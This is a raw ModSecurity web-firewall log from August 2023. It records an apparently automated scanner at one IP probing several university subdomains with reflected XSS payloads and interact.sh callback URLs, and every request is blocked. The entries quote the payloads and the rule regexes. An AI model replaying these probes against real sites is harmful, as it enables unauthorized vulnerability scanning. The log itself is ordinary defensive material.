[Tue Aug 29 11:53:52.973137 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAAox7LgAAAAN"]
[Tue Aug 29 11:53:52.984165 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAoqbXMAAAAj"]
[Tue Aug 29 11:53:53.008562 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApIdlUAAAAU"]
[Tue Aug 29 11:53:53.061454 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApJDU0AAAAY"]
[Tue Aug 29 11:53:53.076811 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154cCo-f0AAApPcukAAAAa"]
[Tue Aug 29 11:53:53.077875 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO154cCo-f0AAAoGFgoAAAAE"]
[Tue Aug 29 11:53:53.084154 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154cCo-f0AAAoZ6UkAAAAK"]
[Tue Aug 29 11:53:53.084274 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApQ2VAAAAAb"]
[Tue Aug 29 11:53:53.084536 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154cCo-f0AAApHRW4AAAAP"]
[Tue Aug 29 11:53:53.546206 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAolKbMAAAAe"]
[Tue Aug 29 11:53:53.548790 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO154cCo-f0AAAo2m8AAAAAA"]
[Tue Aug 29 11:53:53.548839 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAAowNtgAAAAH"]
[Tue Aug 29 11:53:53.569474 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAowNtkAAAAH"]
[Tue Aug 29 11:53:53.588223 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApJDU8AAAAY"]
[Tue Aug 29 11:53:53.589482 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApQ2VIAAAAb"]
[Tue Aug 29 11:53:53.591919 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApIdlkAAAAU"]
[Tue Aug 29 11:53:54.539504 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoW7V8AAAAJ"]
[Tue Aug 29 11:53:54.541042 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoLfXcAAAAG"]
[Tue Aug 29 11:53:54.542133 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoUJeYAAAAB"]
[Tue Aug 29 11:53:54.547460 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoGFg4AAAAE"]
[Tue Aug 29 11:53:54.557545 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAApOdb0AAAAL"]
[Tue Aug 29 11:53:54.567713 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154sCo-f0AAAoUJecAAAAB"]
[Tue Aug 29 11:53:54.614066 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154sCo-f0AAApLWk8AAAAI"]
[Tue Aug 29 11:53:55.595878 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAApJDVMAAAAY"]
[Tue Aug 29 11:53:55.600743 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAofm-QAAAAX"]
[Tue Aug 29 11:53:55.602878 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAolKbcAAAAe"]
[Tue Aug 29 11:53:55.614492 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoAk2UAAAAC"]
[Tue Aug 29 11:53:55.679784 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAApJDVQAAAAY"]
[Tue Aug 29 11:53:55.721401 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAox7MAAAAAN"]
